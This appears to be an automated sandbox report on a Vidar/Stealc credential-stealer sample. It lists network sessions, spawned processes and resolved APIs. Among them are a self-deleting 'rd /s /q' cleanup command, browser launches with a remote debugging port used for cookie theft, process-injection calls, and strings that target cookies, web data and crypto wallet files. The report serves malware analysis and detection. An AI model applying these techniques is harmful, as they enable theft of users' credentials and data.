2024-11-25 10:34:06 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:07 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:06 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: c0af3736-e01e-00aa-6fbf-3eceda000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103406Z-178bfbc474bv587zhC1NYCny5w00000007a0000000000x25 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:07 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.5	49919	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:06 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:07 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:06 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 77237dca-e01e-00aa-2b4b-3eceda000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103406Z-174c587ffdfp4vpjhC1TEBybqw00000005tg00000000atz2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:07 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Target ID:	0
Start time:	05:32:54
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x610000
File size:	281'600 bytes
MD5 hash:	DF96C3D0BB84474F4ED6C4206D1BACEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:33:40
Start date:	25/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:33:40
Start date:	25/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 --field-trial-handle=2536,i,5756797432895461405,5854280884996212389,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:33:53
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:33:53
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2316,i,7298558400750836120,13581212135822597317,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:33:53
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	05:33:54
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	05:33:57
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5252 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:33:58
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6732 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:34:45
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAAFBFBAAKEC" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:34:45
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:34:45
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x440000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:34:53
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6736 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	15

Executed Functions

Function 0062A132 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,006291DC), ref: 0062A146
GetProcAddress.KERNEL32 ref: 0062A15D
GetProcAddress.KERNEL32 ref: 0062A174
GetProcAddress.KERNEL32 ref: 0062A18B
GetProcAddress.KERNEL32 ref: 0062A1A2
GetProcAddress.KERNEL32 ref: 0062A1B9
GetProcAddress.KERNEL32 ref: 0062A1D0
GetProcAddress.KERNEL32 ref: 0062A1E7
GetProcAddress.KERNEL32 ref: 0062A1FE
GetProcAddress.KERNEL32 ref: 0062A215
GetProcAddress.KERNEL32 ref: 0062A22C
GetProcAddress.KERNEL32 ref: 0062A243
GetProcAddress.KERNEL32 ref: 0062A25A
GetProcAddress.KERNEL32 ref: 0062A271
GetProcAddress.KERNEL32 ref: 0062A288
GetProcAddress.KERNEL32 ref: 0062A29F
GetProcAddress.KERNEL32 ref: 0062A2B6
GetProcAddress.KERNEL32 ref: 0062A2CD
GetProcAddress.KERNEL32 ref: 0062A2E4
GetProcAddress.KERNEL32 ref: 0062A2FB
GetProcAddress.KERNEL32 ref: 0062A312
GetProcAddress.KERNEL32 ref: 0062A329
GetProcAddress.KERNEL32 ref: 0062A340
GetProcAddress.KERNEL32 ref: 0062A357
GetProcAddress.KERNEL32 ref: 0062A36E
GetProcAddress.KERNEL32 ref: 0062A385
GetProcAddress.KERNEL32 ref: 0062A39C
GetProcAddress.KERNEL32 ref: 0062A3B3
GetProcAddress.KERNEL32 ref: 0062A3CA
GetProcAddress.KERNEL32 ref: 0062A3E1
GetProcAddress.KERNEL32 ref: 0062A3F8
GetProcAddress.KERNEL32 ref: 0062A40F
GetProcAddress.KERNEL32 ref: 0062A426
GetProcAddress.KERNEL32 ref: 0062A43D
GetProcAddress.KERNEL32 ref: 0062A454
GetProcAddress.KERNEL32 ref: 0062A46B
GetProcAddress.KERNEL32 ref: 0062A482
GetProcAddress.KERNEL32 ref: 0062A499
GetProcAddress.KERNEL32 ref: 0062A4B0
GetProcAddress.KERNEL32 ref: 0062A4C7
GetProcAddress.KERNEL32 ref: 0062A4DE
GetProcAddress.KERNEL32 ref: 0062A4F5
GetProcAddress.KERNEL32 ref: 0062A50C
GetProcAddress.KERNEL32(CreateProcessA), ref: 0062A522
GetProcAddress.KERNEL32(GetThreadContext), ref: 0062A538
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 0062A54E
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 0062A564
GetProcAddress.KERNEL32(ResumeThread), ref: 0062A57A
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 0062A590
GetProcAddress.KERNEL32(SetThreadContext), ref: 0062A5A6
LoadLibraryA.KERNEL32(006291DC), ref: 0062A5B7
LoadLibraryA.KERNEL32 ref: 0062A5C8
LoadLibraryA.KERNEL32 ref: 0062A5D9
LoadLibraryA.KERNEL32 ref: 0062A5EA
LoadLibraryA.KERNEL32 ref: 0062A5FB
LoadLibraryA.KERNEL32 ref: 0062A60C
LoadLibraryA.KERNEL32 ref: 0062A61D
LoadLibraryA.KERNEL32 ref: 0062A62E
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 0062A63E
GetProcAddress.KERNEL32(75FD0000), ref: 0062A659
GetProcAddress.KERNEL32 ref: 0062A670
GetProcAddress.KERNEL32 ref: 0062A687
GetProcAddress.KERNEL32 ref: 0062A69E
GetProcAddress.KERNEL32 ref: 0062A6B5
GetProcAddress.KERNEL32(6FDC0000), ref: 0062A6D4
GetProcAddress.KERNEL32 ref: 0062A6EB
GetProcAddress.KERNEL32 ref: 0062A702
GetProcAddress.KERNEL32 ref: 0062A719
GetProcAddress.KERNEL32 ref: 0062A730
GetProcAddress.KERNEL32 ref: 0062A747
GetProcAddress.KERNEL32 ref: 0062A75E
GetProcAddress.KERNEL32 ref: 0062A775
GetProcAddress.KERNEL32(763B0000), ref: 0062A790
GetProcAddress.KERNEL32 ref: 0062A7A7
GetProcAddress.KERNEL32 ref: 0062A7BE
GetProcAddress.KERNEL32 ref: 0062A7D5
GetProcAddress.KERNEL32 ref: 0062A7EC
GetProcAddress.KERNEL32(750F0000), ref: 0062A80B
GetProcAddress.KERNEL32 ref: 0062A822
GetProcAddress.KERNEL32 ref: 0062A839
GetProcAddress.KERNEL32 ref: 0062A850
GetProcAddress.KERNEL32 ref: 0062A867
GetProcAddress.KERNEL32 ref: 0062A87E
GetProcAddress.KERNEL32(75A50000), ref: 0062A89D
GetProcAddress.KERNEL32 ref: 0062A8B4
GetProcAddress.KERNEL32 ref: 0062A8CB
GetProcAddress.KERNEL32 ref: 0062A8E2
GetProcAddress.KERNEL32 ref: 0062A8F9
GetProcAddress.KERNEL32 ref: 0062A910
GetProcAddress.KERNEL32 ref: 0062A927
GetProcAddress.KERNEL32 ref: 0062A93E
GetProcAddress.KERNEL32 ref: 0062A955
GetProcAddress.KERNEL32(75070000), ref: 0062A970
GetProcAddress.KERNEL32 ref: 0062A987
GetProcAddress.KERNEL32 ref: 0062A99E
GetProcAddress.KERNEL32 ref: 0062A9B5
GetProcAddress.KERNEL32 ref: 0062A9CC
GetProcAddress.KERNEL32(74E50000), ref: 0062A9E7
GetProcAddress.KERNEL32 ref: 0062A9FE
GetProcAddress.KERNEL32(75320000), ref: 0062AA19
GetProcAddress.KERNEL32 ref: 0062AA30
GetProcAddress.KERNEL32(6F060000), ref: 0062AA4F
GetProcAddress.KERNEL32 ref: 0062AA66
GetProcAddress.KERNEL32 ref: 0062AA7D
GetProcAddress.KERNEL32 ref: 0062AA94
GetProcAddress.KERNEL32 ref: 0062AAAB
GetProcAddress.KERNEL32 ref: 0062AAC2
GetProcAddress.KERNEL32 ref: 0062AAD9
GetProcAddress.KERNEL32 ref: 0062AAF0
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 0062AB06
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0062AB1C
GetProcAddress.KERNEL32(74E00000), ref: 0062AB37
GetProcAddress.KERNEL32 ref: 0062AB4E
GetProcAddress.KERNEL32 ref: 0062AB65
GetProcAddress.KERNEL32 ref: 0062AB7C
GetProcAddress.KERNEL32(74DF0000), ref: 0062AB97
GetProcAddress.KERNEL32(6C7F0000), ref: 0062ABB2
GetProcAddress.KERNEL32 ref: 0062ABC9
GetProcAddress.KERNEL32 ref: 0062ABE0
GetProcAddress.KERNEL32 ref: 0062ABF7
GetProcAddress.KERNEL32(6C600000,SymMatchString), ref: 0062AC11

Strings

CreateProcessA, xrefs: 0062A512
HttpQueryInfoA, xrefs: 0062AAF6
GetThreadContext, xrefs: 0062A528
InternetSetOptionA, xrefs: 0062AB0C
SetThreadContext, xrefs: 0062A596
VirtualAllocEx, xrefs: 0062A554
SymMatchString, xrefs: 0062AC0B
dbghelp.dll, xrefs: 0062A634
ResumeThread, xrefs: 0062A56A
WriteProcessMemory, xrefs: 0062A580
ReadProcessMemory, xrefs: 0062A53E

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 15df46f3f9d16fe11c9f5acba500ac4e4077ef92d600d868caffea5f2f4a3822
Instruction ID: 841d309ee5679e5bb8b7076806a8cc3278a0161472d20b53fd5aeeae5fb0254f
Opcode Fuzzy Hash: 15df46f3f9d16fe11c9f5acba500ac4e4077ef92d600d868caffea5f2f4a3822
Instruction Fuzzy Hash: 8F52D679581B11EFDF0A9F61FE499263BA2F70A3573004525FA5582270EF3E6860EF11

Function 0061A941 Relevance: 67.3, APIs: 29, Strings: 9, Instructions: 780
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

FindFirstFileA.KERNEL32(?,?,0064786B,0064786A,00648464,00647867,?,?,?), ref: 0061A9EB
StrCmpCA.SHLWAPI(?,00648468), ref: 0061AA13
StrCmpCA.SHLWAPI(?,0064846C), ref: 0061AA2D

Part of subcall function 006221A5: lstrlenA.KERNEL32(?,?,00629098,006477FE,00647787,?,?,?,?,00629D6E), ref: 006221AB
Part of subcall function 006221A5: lstrcpyA.KERNEL32(00000000,00000000,?,00629098,006477FE,00647787,?,?,?,?,00629D6E), ref: 006221DD

StrCmpCA.SHLWAPI(?,Opera GX,00648470,?,0064786E), ref: 0061AABF
StrCmpCA.SHLWAPI(?,Brave,00648490,00648494,00648470,?,0064786E), ref: 0061AC41
StrCmpCA.SHLWAPI(?,Preferences), ref: 0061AC5B
CopyFileA.KERNEL32(?,?,00000001), ref: 0061AD1B
DeleteFileA.KERNEL32(?), ref: 0061ADEA
StrCmpCA.SHLWAPI(?), ref: 0061AE28
StrCmpCA.SHLWAPI(?), ref: 0061AE92
StrCmpCA.SHLWAPI(0061DCCC), ref: 0061AEA9
CopyFileA.KERNEL32(?,?,00000001), ref: 0061AFA1

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 006240F6: _memset.LIBCMT ref: 0062411D
Part of subcall function 006240F6: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 006241C3
Part of subcall function 006240F6: TerminateProcess.KERNEL32(00000000,00000000), ref: 006241D1
Part of subcall function 006240F6: CloseHandle.KERNEL32(00000000), ref: 006241D8

_memset.LIBCMT ref: 0061B03F
lstrcatA.KERNEL32(?,?), ref: 0061B051
lstrcatA.KERNEL32(?,?), ref: 0061B061
_memset.LIBCMT ref: 0061B251
lstrcatA.KERNEL32(?,?), ref: 0061B263
lstrcatA.KERNEL32(?,?), ref: 0061B273
lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 0061B285
StrCmpCA.SHLWAPI(?), ref: 0061B2D3
CopyFileA.KERNEL32(?,?,00000001), ref: 0061B393

Part of subcall function 00619148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
Part of subcall function 00619148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
Part of subcall function 00619148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
Part of subcall function 00619148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
Part of subcall function 00619148: CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

DeleteFileA.KERNEL32(?), ref: 0061B43E

Part of subcall function 00628BE6: CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
Part of subcall function 00628BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

StrCmpCA.SHLWAPI(?), ref: 0061B46F
lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 0061B073

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

CopyFileA.KERNEL32(?,?,00000001), ref: 0061B1B8
CopyFileA.KERNEL32(?,?,00000001), ref: 0061B52F
DeleteFileA.KERNEL32(?), ref: 0061B5C9
FindNextFileA.KERNEL32(?,?), ref: 0061B6A7
FindClose.KERNEL32(?), ref: 0061B6BB

Strings

Preferences, xrefs: 0061AC4F
Opera GX, xrefs: 0061AAB7
--remote-debugging-port=9223 --profile-directory=", xrefs: 0061B279
\BraveWallet\Preferences, xrefs: 0061AD31
_cookies.db, xrefs: 0061AFEE
--remote-debugging-port=9223 --profile-directory=", xrefs: 0061B067
Brave, xrefs: 0061AC39
_cookies.db, xrefs: 0061B205
_webdata.db, xrefs: 0061B3DB

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
